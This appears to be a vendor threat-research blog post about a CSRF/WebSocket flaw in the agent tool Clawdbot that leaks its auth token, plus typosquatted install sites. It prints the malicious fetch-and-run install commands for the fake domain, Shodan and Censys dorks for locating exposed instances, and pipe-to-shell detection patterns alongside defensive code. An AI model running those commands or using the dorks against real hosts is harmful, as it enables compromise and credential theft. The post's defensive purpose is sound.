Oh Clawp! A 1-Click ClawdBot Exploit leads to RCE over GatewayUrl exfiltrating single-layer authentication Token & Typosquatting campaigns
- stagingppln
- 1 day ago
Authors: Reyben T. Cortes, Azim Uddin, Abdullah Mamun, ThreatCluster, DefusedCyber

Happy Monday! Unless you've been living under a rock, you know we're tracking the development of one of the most controversial conversations in the security community: the release of ClawdBot, which is the only name we will use for it today. While this isn't the first iteration, this agentic tool opens a can of worms on your local system. It crawls every crevice of your files and API credentials and stores what it finds in an .md file, so that it can learn everything it needs to be an effective personal assistant, the type that Copilot dreams of being at night. As this continues to go viral over the next few weeks, we are tracking Japan and APAC (Asia-Pacific) customers that could be affected by the exploitable vulnerability, which has no assigned identifier, in the affected versions we cover below.
Censys Dork: (host.services.endpoints.http.html_title: {"Moltbot Control", "clawdbot Control"} or web.endpoints.http.html_title: {"Moltbot Control", "clawdbot Control"}) and host.location.country = "Japan"
Shodan Dork: http.favicon.hash:-1408625955,-805544463 country:JP
Asia-Pacific: 9,996+

The Clawdbot RCE Vulnerability
On January 26, autonomous hackbot agents at ethiack discovered an input validation issue in Clawdbot's WebSocket gatewayUrl handling. The frontend JavaScript UI accepts a gatewayUrl parameter, while the token is stored in local storage. Because this did not get an assigned CVE (Common Vulnerabilities and Exposures) identifier, it is important to note that the exploitable endpoint is exposed on every single instance we discovered, primarily over gateway port 18789. However, to exfiltrate the locally stored credential, a targeted victim must visit an attacker-controlled website containing the exploit payload. This is known as a CSRF (Cross-Site Request Forgery) attack. Nonetheless, the CVSS score we built for this still uses attack vector: Network.
CVE-2026-8cb0fa9
CVSS 9.6
CWE-352 (CSRF - Cross Site Request Forgery)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Endpoint Target: http://127.0.0.1:18789/chat?session=main
This is an example of a WebSocket endpoint that gets no CORS (Cross-Origin Resource Sharing) enforcement against unknown origins such as an attacker-controlled website. A normal HTTP request would have been subject to those checks. Instead, Clawdbot implemented the resource over WebSocket, which does not get the CORS protections that forbid a page from one origin from talking to another, notably for an incoming request carrying the gatewayUrl. Hence CSRF (Cross-Site Request Forgery) against a resource that should be forbidden. This allows a GET request to reach a victim's locally stored data, such as your Clawdbot authentication tokens.
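One way to close the two gaps described above, as an added example (not Clawdbot's code or its actual patch): the UI only honours a gatewayUrl that points back at its own host or an explicit allowlist, and the gateway checks the Origin header itself because CORS does not cover WebSocket handshakes. It assumes the UI reads gatewayUrl from the query string and sends the stored token to it; the function names, DEFAULT_GATEWAY and the .test hosts are assumptions.

```javascript
// Added example; function names and DEFAULT_GATEWAY are assumptions.
const DEFAULT_GATEWAY = "ws://127.0.0.1:18789"; // port taken from the page

// Client side: choose the WebSocket target that will receive the stored
// token. A gatewayUrl query parameter is honoured only for ws:/wss: URLs
// without userinfo whose host is the UI's own host or an allowlisted one.
function resolveGatewayUrl(pageHref, allowedHosts = []) {
  const page = new URL(pageHref);
  const raw = page.searchParams.get("gatewayUrl");
  const refuse = (reason) => ({ url: DEFAULT_GATEWAY, rejected: reason });
  if (raw === null) return { url: DEFAULT_GATEWAY, rejected: null };
  let target;
  try {
    target = new URL(raw);
  } catch {
    return refuse("unparseable");
  }
  if (target.protocol !== "ws:" && target.protocol !== "wss:") return refuse("scheme");
  if (target.username || target.password) return refuse("userinfo");
  if (target.host !== page.host && !allowedHosts.includes(target.host)) {
    return refuse("foreign-host");
  }
  return { url: target.href, rejected: null };
}

// Server side: CORS is not applied to WebSocket handshakes, so the gateway
// must compare the Origin header of each upgrade request against its own list.
function originAllowed(originHeader, allowedOrigins) {
  if (typeof originHeader !== "string") return false; // no Origin header sent
  let origin;
  try {
    origin = new URL(originHeader).origin;
  } catch {
    return false; // also covers the literal "null" origin
  }
  return allowedOrigins.includes(origin);
}

// Constructed inputs: the UI URL from the page and a made-up foreign host.
const UI = "http://127.0.0.1:18789/chat?session=main";
console.log(resolveGatewayUrl(UI));
console.log(resolveGatewayUrl(UI + "&gatewayUrl=wss://collector.example.test/ws"));
console.log(originAllowed("https://other.example.test", ["http://127.0.0.1:18789"]));
```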
Typosquatting & Crypto Fraud Campaigns

As the Clawdbot craze began to peak, we discovered malicious campaigns, also reported by users, that attempt to trick the victim into executing the Clawdbot install.sh installation script from a one-letter typosquatted domain that victims can easily enter by mistake. The fake domain impersonated the legitimate installation site for Clawdbot, as demonstrated in figure 3. We also checked the site's alleged social media accounts for credibility; however, they were all banned except Telegram, if anyone wants to take a crack: t[.]me/openclawd

Interestingly, we received a submission from a user in Japan, in our APAC region, who attempted to take a shortcut by handing over their crypto wallet and Anthropic API keys to a service that offers to build the Clawdbot agent in 2 minutes. This appears highly suspicious: it charges 0.005 ETH, which is around $12 USD, after connecting the victim's wallet and taking the API keys!
Windows Powershell
iwr -useb https://openclawd[.]ai/install.ps1 | iex
MacOS/Linux
curl -fsSL https://openclawd[.]ai/install.sh | bash
Npm
npm i -g openclawd && openclawd onboard
pnpm
pnpm add -g openclawd && openclawd onboard
Git Clone
git clone https://github.com/openclawd/openclawd[.]git
cd openclawd && pnpm install && pnpm run build
pnpm run openclawd onboard
Security Fixes & Recommendations

Implement Safe Claw security scanning as demonstrated. Users have reported that all skills were vulnerable to 50 different security risks such as prompt injections, malicious commands, and data exfiltration. External audits also reported over 150 vulnerabilities and 8 critical risks, with a 97% injection success rate reported by zeroleaks. These findings suggest you really should be running this internally only, without the agent touching or calling external sources outside your local system, such as parsing your emails or chat groups so that they can interact directly with your Clawd agent.
Vulnerable Ranges
Vulnerable Ranges | Patched Versions |
≤v2026.1.28 | ≥v2026.1.29 |
Conclusion
This is not the first iteration of such a controversial agentic tool. Back in October 2025, Microsoft introduced one of the most concerning features into Copilot, which basically attempts to do what Clawdbot has been trying to do: "collect it all, know it all", regardless of plaintext storage. We encourage organizations and local users exposing Clawdbot instances to the internet to create a cron job for staying up to date with releases of the platform as more users and organizations continue to experiment with the tool. Such instances should be sandboxed and run in a Tailscale environment, which prevents exposure of gateway port 18789 directly to the internet. Upgrade to the latest versions (≥v2026.1.29) to patch the 1-click vulnerability exploit, which affects all versions ≤v2026.1.28. In addition, we discovered clever typosquatting domains and fake Clawdbot deployment services that connect to victim wallets and steal Anthropic API keys in the process. Automate security hardening with tools such as Safe Claw to block dangerous inputs like rm -rf. We included indicators of the malicious domains below and created detection rules to detect possible exfiltration from a CSRF attack, including possible exfiltration of auth tokens.
RiskSensor Solution: Real Time Identification
If you are looking for real-time identification, RiskSensor, our 2025 award-winning solution, quickly validates your attack surface across all your environments. In conjunction with our proactive threat research team, Unit Zero, we have informed vulnerable organizations to patch against the 1-click Clawdbot RCE exploit to proactively protect our customers in Japan and across APAC (Asia-Pacific).
KQL Detection Rule
1-Click CSRF Moltbot Malicious GET Request & Token Exfiltration
Indicators & C2 domains
Indicator | Type | Note |
openclawd[.]ai | domain | Impersonated domain |
5d69bb6582270d83d783793759798ce3b9e5bdd05548d4b68ff3049be0ef3883 | SHA256 | openclaw_doctor-0.1.0-py3-none-any.whl |
913d0fab6b528c7796ae4183e27f4ba19bb18c948e9cd9ad0840ffede222416b | SHA256 | openclaw.py |
autoclaw[.]space | domain | Get your OpenClaw instance running in minutes connect your wallet to continue with Base Network... |
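A way to hunt for the lure in shell history or command-line telemetry, as an added example that is not one of the authors' detection rules: it matches the two domains from the table above and the package name from the install commands listed earlier, and records whether the script was piped straight into an interpreter. The function names and the sample lines are constructed for illustration.

```javascript
// Added example. Indicators come from this page's table and install
// commands; the sample command lines are constructed.
const BAD_DOMAINS = ["openclawd.ai", "autoclaw.space"];
const BAD_PACKAGES = ["openclawd"];
const PIPE_TO_SHELL =
  /\b(curl|wget|iwr|irm)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh|iex)\b/i;
const PKG_INSTALL =
  /\b(?:npm\s+(?:i|install)|pnpm\s+add)\s+(?:-g\s+)?([\w@\/.-]+)/i;

// Undo common defanging ("hxxp", "[.]", "(.)") so indicators match.
function refang(text) {
  return text.replace(/hxxp/gi, "http").replace(/\[\.\]|\(\.\)/g, ".");
}

// Hostnames of every http(s) URL in a command line, taken from the URL
// parser so userinfo and ports cannot hide the real host.
function hostsIn(cmd) {
  const hosts = [];
  for (const [raw] of cmd.matchAll(/https?:\/\/[^\s'"|]+/gi)) {
    try {
      hosts.push(new URL(raw).hostname.replace(/\.$/, ""));
    } catch { /* not a parseable URL; ignore */ }
  }
  return hosts;
}

function classify(line) {
  const cmd = refang(line);
  const iocs = hostsIn(cmd)
    .filter((h) => BAD_DOMAINS.some((d) => h === d || h.endsWith("." + d)))
    .map((h) => "domain:" + h);
  const pkg = cmd.match(PKG_INSTALL);
  if (pkg && BAD_PACKAGES.includes(pkg[1].toLowerCase())) iocs.push("package:" + pkg[1]);
  return { iocs, executed: PIPE_TO_SHELL.test(cmd) };
}

// Keep only lines that hit an indicator; "executed" separates a download
// from a script that was piped straight into an interpreter.
function scan(lines) {
  return lines.map((line) => ({ line, ...classify(line) }))
    .filter((r) => r.iocs.length > 0);
}

const SAMPLE_HISTORY = [ // constructed
  "curl -fsSL https://openclawd[.]ai/install.sh | bash",
  "curl -fsSL https://example.test/install.sh | bash",
  "npm i -g openclawd && openclawd onboard",
  "wget https://docs.openclawd.ai.example.test/readme.txt",
];
console.log(scan(SAMPLE_HISTORY));
```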














